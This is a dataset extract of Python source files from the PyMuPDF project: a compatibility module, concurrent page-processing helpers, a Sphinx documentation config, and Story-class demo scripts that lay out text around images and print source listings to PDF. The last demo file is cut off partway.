id int64 0 458k | file_name stringlengths 4 119 | file_path stringlengths 14 227 | content stringlengths 24 9.96M | size int64 24 9.96M | language stringclasses 1 value | extension stringclasses 14 values | total_lines int64 1 219k | avg_line_length float64 2.52 4.63M | max_line_length int64 5 9.91M | alphanum_fraction float64 0 1 | repo_name stringlengths 7 101 | repo_stars int64 100 139k | repo_forks int64 0 26.4k | repo_open_issues int64 0 2.27k | repo_license stringclasses 12 values | repo_extraction_date stringclasses 433 values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
21,300 | fitz___init__.py | pymupdf_PyMuPDF/src/fitz___init__.py | # pylint: disable=wildcard-import,unused-import,unused-wildcard-import
from pymupdf import *
from pymupdf import _as_fz_document
from pymupdf import _as_fz_page
from pymupdf import _as_pdf_document
from pymupdf import _as_pdf_page
from pymupdf import _log_items
from pymupdf import _log_items_active
from pymupdf import _log_items_clear
from pymupdf import __version__
from pymupdf import __doc__
| 397 | Python | .py | 11 | 35.090909 | 70 | 0.818653 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,301 | _apply_pages.py | pymupdf_PyMuPDF/src/_apply_pages.py | import multiprocessing
import os
import time
import pymupdf
# Support for concurrent processing of document pages.
#
class _worker_State:
    # Simple namespace holding per-process worker configuration.
    # Attributes (path, pagefn, pagefn_args, pagefn_kwargs, stats, document)
    # are populated by _worker_init() inside each worker process.
    pass
# Module-level singleton; each worker process gets its own copy after fork/spawn.
_worker_state = _worker_State()
def _worker_init(
        path,
        initfn,
        initfn_args,
        initfn_kwargs,
        pagefn,
        pagefn_args,
        pagefn_kwargs,
        stats,
        ):
    """Populate the module-level `_worker_state` for this worker process.

    Records the document path, the per-page callable with its arguments and
    the stats flag, then runs the optional per-process `initfn`. The document
    itself is opened lazily later (see `_worker_fn`).
    """
    # pylint: disable=attribute-defined-outside-init
    state = _worker_state
    state.path = path
    state.pagefn = pagefn
    state.pagefn_args = pagefn_args
    state.pagefn_kwargs = pagefn_kwargs
    state.stats = stats
    state.document = None  # opened on first use by _worker_fn()
    if initfn:
        initfn(*initfn_args, **initfn_kwargs)
def _stats_write(t, label):
    """Log the time elapsed since `t` together with `label`, if >= 0.1s.

    Args:
        t: start time as returned by time.time().
        label: short description of the timed operation.
    """
    elapsed = time.time() - t
    if elapsed >= 0.1:
        # Bug fix: the original spec `{t:2f}` set a minimum field width of 2
        # with the default 6 decimal places; `.2f` (two decimal places) was
        # clearly intended for a human-readable duration.
        pymupdf.log(f'{os.getpid()=}: {elapsed:.2f}s: {label}.')
def _worker_fn(page_number):
    """Run the configured page function on page `page_number`.

    The Document is created lazily on the first call within each worker
    process and cached in `_worker_state`. Timing statistics are written
    via _stats_write() when enabled.
    """
    state = _worker_state
    # Open the document the first time this process handles a page.
    if not state.document:
        if state.stats:
            t0 = time.time()
        state.document = pymupdf.Document(state.path)  # pylint: disable=attribute-defined-outside-init
        if state.stats:
            _stats_write(t0, 'pymupdf.Document()')
    if state.stats:
        t0 = time.time()
    page = state.document[page_number]
    if state.stats:
        _stats_write(t0, '_worker_state.document[page_number]')
    if state.stats:
        t0 = time.time()
    result = state.pagefn(
            page,
            *state.pagefn_args,
            **state.pagefn_kwargs,
            )
    if state.stats:
        _stats_write(t0, '_worker_state.pagefn()')
    return result
def _multiprocessing(
        path,
        pages,
        pagefn,
        pagefn_args,
        pagefn_kwargs,
        initfn,
        initfn_args,
        initfn_kwargs,
        concurrency,
        stats,
        ):
    """Process `pages` of document `path` with a multiprocessing.Pool.

    Each pool worker is set up by _worker_init() and then _worker_fn() is
    mapped over the page numbers; the results are returned as a list in
    page order.
    """
    init_args = (
            path,
            initfn, initfn_args, initfn_kwargs,
            pagefn, pagefn_args, pagefn_kwargs,
            stats,
            )
    with multiprocessing.Pool(concurrency, _worker_init, init_args) as pool:
        # pool.map() blocks until all pages are processed; it is equivalent
        # to the map_async(...).get() formulation.
        return pool.map(_worker_fn, pages)
def _fork(
        path,
        pages,
        pagefn,
        pagefn_args,
        pagefn_kwargs,
        initfn,
        initfn_args,
        initfn_kwargs,
        concurrency,
        stats,
        ):
    """Process document pages concurrently using raw os.fork().

    Forks `concurrency` child processes (defaults to the CPU count). Page
    numbers are pushed onto `queue_down`; each child repeatedly pops the
    next page number, applies `pagefn` and pushes `(page_num, result)` onto
    `queue_up`. The parent collects the results into a list ordered by page
    number. If a child sends an exception, the first one received is
    re-raised. Children are always reaped via os.waitpid() in the `finally`
    block.

    NOTE(review): the parent sends `range(len(pages))` down the queue, not
    the values contained in `pages` — confirm callers always pass a
    contiguous 0-based page range (unlike _multiprocessing(), which maps
    over the `pages` values themselves).
    """
    verbose = 0
    if concurrency is None:
        concurrency = multiprocessing.cpu_count()
    # We write page numbers to `queue_down` and read `(page_num, text)` from
    # `queue_up`. Workers each repeatedly read the next available page number
    # from `queue_down`, extract the text and write it onto `queue_up`.
    #
    # This is better than pre-allocating a subset of pages to each worker
    # because it ensures there will never be idle workers until we are near the
    # end with fewer pages left than workers.
    #
    queue_down = multiprocessing.Queue()
    queue_up = multiprocessing.Queue()
    def childfn():
        # Runs inside each forked child: consume page numbers until we
        # receive the `None` sentinel.
        document = None
        if verbose:
            pymupdf.log(f'{os.getpid()=}: {initfn=} {initfn_args=}')
        _worker_init(
                path,
                initfn,
                initfn_args,
                initfn_kwargs,
                pagefn,
                pagefn_args,
                pagefn_kwargs,
                stats,
                )
        while 1:
            if verbose:
                pymupdf.log(f'{os.getpid()=}: calling get().')
            page_num = queue_down.get()
            if verbose:
                pymupdf.log(f'{os.getpid()=}: {page_num=}.')
            if page_num is None:
                # Sentinel from the parent: no more work.
                break
            try:
                # Open the document lazily on the first page we handle.
                if not document:
                    if stats:
                        t = time.time()
                    document = pymupdf.Document(path)
                    if stats:
                        _stats_write(t, 'pymupdf.Document(path)')
                if stats:
                    t = time.time()
                page = document[page_num]
                if stats:
                    _stats_write(t, 'document[page_num]')
                if verbose:
                    pymupdf.log(f'{os.getpid()=}: {_worker_state=}')
                if stats:
                    t = time.time()
                ret = pagefn(
                        page,
                        *_worker_state.pagefn_args,
                        **_worker_state.pagefn_kwargs,
                        )
                if stats:
                    _stats_write(t, f'{page_num=} pagefn()')
            except Exception as e:
                # Send the exception itself up; the parent re-raises it.
                if verbose: pymupdf.log(f'{os.getpid()=}: exception {e=}')
                ret = e
            if verbose:
                pymupdf.log(f'{os.getpid()=}: sending {page_num=} {ret=}')
            queue_up.put( (page_num, ret) )
    error = None
    pids = list()
    try:
        # Start child processes.
        if stats:
            t = time.time()
        for i in range(concurrency):
            p = os.fork() # pylint: disable=no-member
            if p == 0:
                # Child process. os._exit() ensures we never fall through
                # into the parent's code after childfn() returns or raises.
                try:
                    try:
                        childfn()
                    except Exception as e:
                        pymupdf.log(f'{os.getpid()=}: childfn() => {e=}')
                        raise
                finally:
                    if verbose:
                        pymupdf.log(f'{os.getpid()=}: calling os._exit(0)')
                    os._exit(0)
            pids.append(p)
        if stats:
            _stats_write(t, 'create child processes')
        # Send page numbers.
        if stats:
            t = time.time()
        if verbose:
            pymupdf.log(f'Sending page numbers.')
        for page_num in range(len(pages)):
            queue_down.put(page_num)
        if stats:
            _stats_write(t, 'Send page numbers')
        # Collect results. We give up if any worker sends an exception instead
        # of text, but this hasn't been tested.
        ret = [None] * len(pages)
        for i in range(len(pages)):
            page_num, text = queue_up.get()
            if verbose:
                pymupdf.log(f'{page_num=} {len(text)=}')
            assert ret[page_num] is None
            if isinstance(text, Exception):
                if not error:
                    error = text
                break
            ret[page_num] = text
        # Close queue. This should cause exception in workers and terminate
        # them, but on macos-arm64 this does not seem to happen, so we also
        # send None, which makes workers terminate.
        for i in range(concurrency):
            queue_down.put(None)
        if verbose: pymupdf.log(f'Closing queues.')
        queue_down.close()
        if error:
            raise error
        if verbose:
            pymupdf.log(f'After concurrent, returning {len(ret)=}')
        return ret
    finally:
        # Join all child processes, even on the error path above.
        if stats:
            t = time.time()
        for pid in pids:
            if verbose:
                pymupdf.log(f'waiting for {pid=}.')
            e = os.waitpid(pid, 0)
            if verbose:
                pymupdf.log(f'{pid=} => {e=}')
        if stats:
            _stats_write(t, 'Join all child proceses')
| 7,569 | Python | .py | 225 | 21.866667 | 120 | 0.509275 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,302 | conf.py | pymupdf_PyMuPDF/docs/conf.py | # -*- coding: utf-8 -*-
#
import re
import sys
import os
import datetime
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath("."))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = "4.2.0"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
# extensions = ["sphinx.ext.autodoc", "sphinx.ext.coverage", "sphinx.ext.ifconfig"]
extensions = ['sphinx_copybutton','notfound.extension']
# rst2pdf is not available on OpenBSD.
if hasattr(os, "uname") and os.uname()[0] != "OpenBSD":
extensions.append("rst2pdf.pdfbuilder")
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix of source filenames.
source_suffix = ".rst"
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
root_doc = "index"
# General information about the project.
project = "PyMuPDF"
thisday = datetime.date.today()
copyright = "2015-" + str(thisday.year) + ", Artifex"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
# Extract the release version from src/__init__.py (pymupdf_version = "...").
_path = os.path.abspath(f'{__file__}/../../src/__init__.py')
with open(_path) as f:
    for line in f:
        # Match e.g. pymupdf_version = "1.24.0" or "1.24.0rc1".
        match = re.search(r'pymupdf_version = "([0-9][.][0-9]+[.][0-9]+(rc[0-9]+)?)"', line)
        if match:
            release = match.group(1)
            print(f'{__file__}: setting version from {_path}: {release}')
            break
    else:
        # Bug fix: the message used to say `VersionBind = ...`, which is not
        # what the regex above actually searches for.
        raise Exception(f'Failed to find `pymupdf_version = ...` in {_path}')
# The short X.Y version
version = release
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ["_build", "build"]
# The reST default role (used for this markup: `text`) to use for all
# documents.
default_role = "any"
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
keep_warnings = False
# Localization vars
gettext_uuid = True
gettext_compact = False
locale_dirs = ["locales"]
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "furo"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# NOTE(review): these look like sphinx_rtd_theme options, but html_theme is
# "furo" and this whole dict is *overwritten* by a second html_theme_options
# assignment further below — none of these values take effect. Confirm and
# remove one of the two assignments.
html_theme_options = {
    "canonical_url": "",
    "logo_only": False,
    "display_version": True,
    "prev_next_buttons_location": None,
    # Toc options
    "collapse_navigation": True,
    "sticky_navigation": True,
    "navigation_depth": 4,
    "includehidden": True,
    "titles_only": False,
}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = "_static/PyMuPDF.ico"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# NOTE(review): this assignment replaces (rather than extends) the earlier
# html_theme_options dict above; only these furo logo options are in effect.
html_theme_options = {
    "light_logo": "sidebar-logo-dark.svg",
    "dark_logo": "sidebar-logo-light.svg",
}
# A list of CSS files. The entry must be a filename string or a tuple containing
# the filename string and the attributes dictionary. The filename must be
# relative to the html_static_path, or a full URI
html_css_files = ["custom.css"]
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = "%d. %b %Y"
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = False
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
html_additional_pages = {}
# If false, no module index is generated.
html_domain_indices = True
# If false, no index is generated.
html_use_index = True
# If true, the index is split into individual pages for each letter.
html_split_index = True
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = True
html_sourcelink_suffix = ".rst"
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
html_use_opensearch = ""
# This is the file name suffix for HTML files (e.g. ".xhtml").
html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = "PyMuPDF"
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# "fontpkg": r"\usepackage[sfdefault]{ClearSans} \usepackage[T1]{fontenc}"
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [("index", "PyMuPDF.tex", "PyMuPDF Documentation", "Artifex", "manual")]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = "images/pymupdf-logo.png"
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = True
# latex_use_xindy = True
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
latex_domain_indices = True
# -- Options for PDF output --------------------------------------------------
# Grouping the document tree into PDF files. List of tuples
# (source start file, target name, title, author).
pdf_documents = [("index", "PyMuPDF", "PyMuPDF Manual", "Artifex")]
# A comma-separated list of custom stylesheets. Example:
# pdf_stylesheets = ["sphinx", "bahnschrift", "a4"]
# Create a compressed PDF
pdf_compressed = True
# A colon-separated list of folders to search for fonts. Example:
# pdf_font_path=['/usr/share/fonts', '/usr/share/texmf-dist/fonts/']
# Language to be used for hyphenation support
pdf_language = "en_US"
# If false, no index is generated.
pdf_use_index = True
# If false, no modindex is generated.
pdf_use_modindex = True
# If false, no coverpage is generated.
pdf_use_coverpage = True
pdf_break_level = 2
pdf_verbosity = 0
pdf_invariant = True
| 8,979 | Python | .py | 207 | 41.449275 | 91 | 0.721048 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,303 | quickfox-image-no-go.py | pymupdf_PyMuPDF/docs/samples/quickfox-image-no-go.py | """
This is a demo script using PyMuPDF's Story class to output text as a PDF with
a two-column page layout.
The script demonstrates the following features:
* Layout text around images of an existing ("target") PDF.
* Based on a few global parameters, areas on each page are identified, that
can be used to receive text layouted by a Story.
* These global parameters are not stored anywhere in the target PDF and
must therefore be provided in some way.
- The width of the border(s) on each page.
- The fontsize to use for text. This value determines whether the provided
text will fit in the empty spaces of the (fixed) pages of target PDF. It
cannot be predicted in any way. The script ends with an exception if
target PDF has not enough pages, and prints a warning message if not all
pages receive at least some text. In both cases, the FONTSIZE value
can be changed (a float value).
- Use of a 2-column page layout for the text.
* The layout creates a temporary (memory) PDF. Its produced page content
(the text) is used to overlay the corresponding target page. If text
requires more pages than are available in target PDF, an exception is raised.
If not all target pages receive at least some text, a warning is printed.
* The script reads "image-no-go.pdf" in its own folder. This is the "target" PDF.
It contains 2 pages with each 2 images (from the original article), which are
positioned at places that create a broad overall test coverage. Otherwise the
pages are empty.
* The script produces "quickfox-image-no-go.pdf" which contains the original pages
and image positions, but with the original article text laid out around them.
Note:
--------------
This script version uses just image positions to derive "No-Go areas" for
layouting the text. Other PDF objects types are detectable by PyMuPDF and may
be taken instead or in addition, without influencing the layouting.
The following are candidates for other such "No-Go areas". Each can be detected
and located by PyMuPDF:
* Annotations
* Drawings
* Existing text
--------------
The text and images are taken from the somewhat modified Wikipedia article
https://en.wikipedia.org/wiki/The_quick_brown_fox_jumps_over_the_lazy_dog.
--------------
"""
import io
import os
import zipfile
import pymupdf
thisdir = os.path.dirname(os.path.abspath(__file__))
myzip = zipfile.ZipFile(os.path.join(thisdir, "quickfox.zip"))
docname = os.path.join(thisdir, "image-no-go.pdf") # "no go" input PDF file name
outname = os.path.join(thisdir, "quickfox-image-no-go.pdf") # output PDF file name
BORDER = 36 # global parameter
FONTSIZE = 12.5 # global parameter
COLS = 2 # number of text columns, global parameter
def analyze_page(page):
    """Compute MediaBox and rectangles on page that are free to receive text.
    Notes:
        Assume a BORDER around the page, make 2 columns of the resulting
        sub-rectangle and extract the rectangles of all images on page.
        For demo purposes, the image rectangles are taken as "NO-GO areas"
        on the page when writing text with the Story.
        The function returns free areas for each of the columns.
    Returns:
        (page.number, mediabox, CELLS), where CELLS is a list of free cells.
    """
    prect = page.rect  # page rectangle - will be our MEDIABOX later
    where = prect + (BORDER, BORDER, -BORDER, -BORDER)
    TABLE = pymupdf.make_table(where, rows=1, cols=COLS)
    # extract rectangles covered by images on this page
    IMG_RECTS = sorted(  # image rects on page (sort top-left to bottom-right)
        [pymupdf.Rect(item["bbox"]) for item in page.get_image_info()],
        key=lambda b: (b.y1, b.x0),
    )
    def free_cells(column):
        """Return free areas in this column."""
        free_stripes = []  # y-value pairs wrapping a free area stripe
        # intersecting images: block complete intersecting column stripe
        # (abs(rect) is the rectangle area, so this tests for a non-empty
        # intersection between image and column)
        col_imgs = [(b.y0, b.y1) for b in IMG_RECTS if abs(b & column) > 0]
        s_y0 = column.y0  # top y-value of column
        for y0, y1 in col_imgs:  # an image stripe
            # Only keep stripes tall enough for at least one text line.
            if y0 > s_y0 + FONTSIZE:  # image starts below last free btm value
                free_stripes.append((s_y0, y0))  # store as free stripe
            s_y0 = y1  # start of next free stripe
        if s_y0 + FONTSIZE < column.y1:  # enough room to column bottom
            free_stripes.append((s_y0, column.y1))
        if free_stripes == []:  # covers "no image in this column"
            free_stripes.append((column.y0, column.y1))
        # make available cells of this column
        CELLS = [pymupdf.Rect(column.x0, y0, column.x1, y1) for (y0, y1) in free_stripes]
        return CELLS
    # collection of available Story rectangles on page
    CELLS = []
    for i in range(COLS):
        CELLS.extend(free_cells(TABLE[0][i]))
    return page.number, prect, CELLS
HTML = myzip.read("quickfox.html").decode()
# --------------------------------------------------------------
# Make the Story object
# --------------------------------------------------------------
story = pymupdf.Story(HTML)
# modify the DOM somewhat
body = story.body # access HTML body
body.set_properties(font="sans-serif") # and give it our font globally
# modify certain nodes
para = body.find("p", None, None) # find relevant nodes (here: paragraphs)
while para != None:
para.set_properties( # method MUST be used for existing nodes
indent=15,
fontsize=FONTSIZE,
)
para = para.find_next("p", None, None)
# we remove all image references, because the target PDF already has them
img = body.find("img", None, None)
while img != None:
next_img = img.find_next("img", None, None)
img.remove()
img = next_img
page_info = {} # contains MEDIABOX and free CELLS per page
doc = pymupdf.open(docname)
for page in doc:
pno, mediabox, cells = analyze_page(page)
page_info[pno] = (mediabox, cells)
doc.close() # close target PDF for now - re-open later
fileobject = io.BytesIO() # let DocumentWriter write to memory
writer = pymupdf.DocumentWriter(fileobject) # define output writer
more = 1 # stop if this ever becomes zero
pno = 0 # count output pages
while more: # loop until all HTML text has been written
try:
MEDIABOX, CELLS = page_info[pno]
except KeyError: # too much text space required: reduce fontsize?
raise ValueError("text does not fit on target PDF")
dev = writer.begin_page(MEDIABOX) # prepare a new output page
for cell in CELLS: # iterate over free cells on this page
if not more: # need to check this for every cell
continue
more, _ = story.place(cell)
story.draw(dev)
writer.end_page() # finish the PDF page
pno += 1
writer.close() # close DocumentWriter output
# Re-open writer output, read its pages and overlay target pages with them.
# The generated pages have same dimension as their targets.
src = pymupdf.open("pdf", fileobject)  # the laid-out text, one page per target page
# Bug fix: open via the known `docname` instead of `doc.name` - `doc` was
# closed earlier, and reading attributes of a closed Document is fragile.
doc = pymupdf.open(docname)
for page in doc:  # overlay every target page with the prepared text
    if page.number >= src.page_count:
        print(f"Text only uses {src.page_count} target pages!")
        continue  # story did not need all target pages?
    # overlay target page
    page.show_pdf_page(page.rect, src, page.number)
    # DEBUG start --- draw the text rectangles
    # mb, cells = page_info[page.number]
    # for cell in cells:
    #     page.draw_rect(cell, color=(1, 0, 0))
    # DEBUG stop ---
doc.ez_save(outname)
| 7,719 | Python | .py | 156 | 43.865385 | 90 | 0.678224 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,304 | code-printer.py | pymupdf_PyMuPDF/docs/samples/code-printer.py | """
Demo script PyMuPDF Story class
-------------------------------
Read the Python sources in the script directory and create a PDF of all their
source codes.
The following features are included as a specialty:
1. HTML source for pymupdf.Story created via Python API exclusively
2. Separate Story objects for page headers and footers
3. Use of HTML "id" elements for identifying source start pages
4. Generate a Table of Contents pointing to source file starts. This
- uses the new Stoy callback feature
- uses Story also for making the TOC page(s)
"""
import io
import os
import time
import pymupdf
THISDIR = os.path.dirname(os.path.abspath(__file__))
TOC = [] # this will contain the TOC list items
CURRENT_ID = "" # currently processed filename - stored by recorder func
MEDIABOX = pymupdf.paper_rect("a4-l") # chosen page size
WHERE = MEDIABOX + (36, 50, -36, -36) # sub rectangle for source content
# location of the header rectangle
HDR_WHERE = (36, 5, MEDIABOX.width - 36, 40)
# location of the footer rectangle
FTR_WHERE = (36, MEDIABOX.height - 36, MEDIABOX.width - 36, MEDIABOX.height)
def recorder(elpos):
    """Callback function invoked during story.place().

    Generates / collects all TOC items and updates the value of CURRENT_ID,
    which is used to update the footer line of each page.

    Args:
        elpos: element-position object supplied by the Story; the attributes
            used here are open_close, heading, rect, page, text and id.
    """
    global TOC, CURRENT_ID
    if not elpos.open_close & 1:  # only consider "open" items
        return
    level = elpos.heading
    y0 = elpos.rect[1]  # top of written rectangle (use for TOC)
    if level > 0:  # this is a header (h1 - h6)
        # Fix: removed unused local `pno`; the page number is computed inline.
        TOC.append(
            (
                level,
                elpos.text,
                elpos.page + 1,
                y0,
            )
        )
        return
    CURRENT_ID = elpos.id if elpos.id else ""  # update for footer line
    return
def header_story(text):
    """Create a one-paragraph Story used as the page header."""
    story = pymupdf.Story()
    story.body.add_paragraph().set_properties(
        font="sans-serif",
        fontsize=12,
        bold=True,
        color="green",
        bgcolor="#eee",
        align=pymupdf.TEXT_ALIGN_CENTER,
    ).add_text(text)
    return story
def footer_story(text):
    """Create a one-paragraph Story used as the page footer."""
    story = pymupdf.Story()
    story.body.add_paragraph().set_properties(
        font="sans-serif",
        fontsize=10,
        color="blue",
        bgcolor="#eee",
        align=pymupdf.TEXT_ALIGN_CENTER,
    ).add_text(text)
    return story
def code_printer(outfile):
    """Write a PDF listing all Python sources in THISDIR to `outfile`.

    Builds one Story containing every ``*.py`` file as a code block, then
    lays it out page by page, adding a header and a footer Story to each
    page. The footer shows the file currently being printed, tracked by
    the `recorder` callback via the module-global CURRENT_ID.

    Args:
        outfile: filename or file-like object accepted by
            pymupdf.DocumentWriter.

    Raises:
        ValueError: if the header or footer story does not fit its rectangle.

    Fixes vs. previous version: removed the dead `global MAX_TITLE_LEN`
    declaration (never assigned or read) and the unused locals
    `thispath` / `basename`; file reading now uses a context manager.
    """
    where = +WHERE  # work on a copy of the content rectangle
    writer = pymupdf.DocumentWriter(outfile, "")
    print_time = time.strftime("%Y-%m-%d %H:%M:%S (%z)")
    story = pymupdf.Story()
    body = story.body
    body.set_properties(font="sans-serif")
    text = f"Python sources in folder '{THISDIR}'"
    body.add_header(1).add_text(text)  # the only h1 item in the story
    files = os.listdir(THISDIR)  # list / select Python files in our directory
    i = 1
    for code_file in files:
        if not code_file.endswith(".py"):
            continue
        # Read the Python file source; the context manager closes the file
        # even if decoding fails.
        with open(os.path.join(THISDIR, code_file), "rb") as fileinput:
            text = fileinput.read().decode()
        # make level 2 header
        hdr = body.add_header(2)
        if i > 1:
            hdr.set_pagebreak_before()
        hdr.add_text(f"{i}. Listing of file '{code_file}'")
        # Write the file code; set_id() marks the source start for recorder().
        body.add_codeblock().set_bgcolor((240, 255, 210)).set_color("blue").set_id(
            code_file
        ).set_fontsize(10).add_text(text)
        # Indicate end of a source file
        body.add_paragraph().set_align(pymupdf.TEXT_ALIGN_CENTER).add_text(
            f"---------- End of File '{code_file}' ----------"
        )
        i += 1  # update file counter
    i = 0
    while True:
        i += 1
        device = writer.begin_page(MEDIABOX)
        # create Story objects for header, footer and the rest.
        header = header_story(f"Python Files in '{THISDIR}'")
        hdr_ok, _ = header.place(HDR_WHERE)
        if hdr_ok != 0:  # non-zero: the header content did not fit
            raise ValueError("header does not fit")
        header.draw(device, None)
        # --------------------------------------------------------------
        # Write the file content.
        # --------------------------------------------------------------
        more, filled = story.place(where)
        # Inform the callback function.
        # Args:
        #   recorder: the Python function to call
        #   {}: dictionary containing anything - we pass the page number
        story.element_positions(recorder, {"page": i - 1})
        story.draw(device, None)
        # --------------------------------------------------------------
        # Make / write page footer.
        # We MUST have a paragraph b/o background color / alignment
        # --------------------------------------------------------------
        if CURRENT_ID:
            text = f"File '{CURRENT_ID}' printed at {print_time}{chr(160)*5}{'-'*10}{chr(160)*5}Page {i}"
        else:
            text = f"Printed at {print_time}{chr(160)*5}{'-'*10}{chr(160)*5}Page {i}"
        footer = footer_story(text)
        # write the page footer
        ftr_ok, _ = footer.place(FTR_WHERE)
        if ftr_ok != 0:
            raise ValueError("footer does not fit")
        footer.draw(device, None)
        writer.end_page()
        if more == 0:  # the whole story has been written
            break
    writer.close()
if __name__ == "__main__" or os.environ.get('PYTEST_CURRENT_TEST'):
fileptr1 = io.BytesIO()
t0 = time.perf_counter()
code_printer(fileptr1) # make the PDF
t1 = time.perf_counter()
doc = pymupdf.open("pdf", fileptr1)
old_count = doc.page_count
# -----------------------------------------------------------------------------
# Post-processing step to make / insert the toc
# This also works using pymupdf.Story:
# - make a new PDF in memory which contains pages with the TOC text
# - add these TOC pages to the end of the original file
# - search item text on the inserted pages and cover each with a PDF link
# - move the TOC pages to the front of the document
# -----------------------------------------------------------------------------
story = pymupdf.Story()
body = story.body
body.add_header(1).set_font("sans-serif").add_text("Table of Contents")
# prefix TOC with an entry pointing to this page
TOC.insert(0, [1, "Table of Contents", old_count + 1, 36])
for item in TOC[1:]: # write the file name headers as TOC lines
body.add_paragraph().set_font("sans-serif").add_text(
item[1] + f" - ({item[2]})"
)
fileptr2 = io.BytesIO() # put TOC pages to a separate PDF initially
writer = pymupdf.DocumentWriter(fileptr2)
i = 1
more = 1
while more:
device = writer.begin_page(MEDIABOX)
header = header_story(f"Python Files in '{THISDIR}'")
# write the page header
hdr_ok, _ = header.place(HDR_WHERE)
header.draw(device, None)
more, filled = story.place(WHERE)
story.draw(device, None)
footer = footer_story(f"TOC-{i}") # separate page numbering scheme
# write the page footer
ftr_ok, _ = footer.place(FTR_WHERE)
footer.draw(device, None)
writer.end_page()
i += 1
writer.close()
doc2 = pymupdf.open("pdf", fileptr2) # open TOC pages as another PDF
doc.insert_pdf(doc2) # and append to the main PDF
new_range = range(old_count, doc.page_count) # the TOC page numbers
pages = [doc[i] for i in new_range] # these are the TOC pages within main PDF
for item in TOC: # search for TOC item text to get its rectangle
for page in pages:
rl = page.search_for(item[1], flags=pymupdf.TEXTFLAGS_SEARCH)
if rl != []: # this text must be on next page
break
else:
assert 0, f'Cannot find {item[1]=} in {len(pages)=}.'
rect = rl[0] # rectangle of TOC item text
link = { # make a link from it
"kind": pymupdf.LINK_GOTO,
"from": rect,
"to": pymupdf.Point(0, item[3]),
"page": item[2] - 1,
}
page.insert_link(link)
# insert the TOC in the main PDF
doc.set_toc(TOC)
# move all the TOC pages to the desired place (1st page here)
for i in new_range:
doc.move_page(doc.page_count - 1, 0)
doc.ez_save(__file__.replace(".py", ".pdf"))
| 8,752 | Python | .py | 216 | 33.375 | 105 | 0.583441 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,305 | simple-grid.py | pymupdf_PyMuPDF/docs/samples/simple-grid.py | import pymupdf
MEDIABOX = pymupdf.paper_rect("letter") # output page format: Letter
GRIDSPACE = pymupdf.Rect(100, 100, 400, 400)
GRID = pymupdf.make_table(GRIDSPACE, rows=2, cols=2)
CELLS = [GRID[i][j] for i in range(2) for j in range(2)]
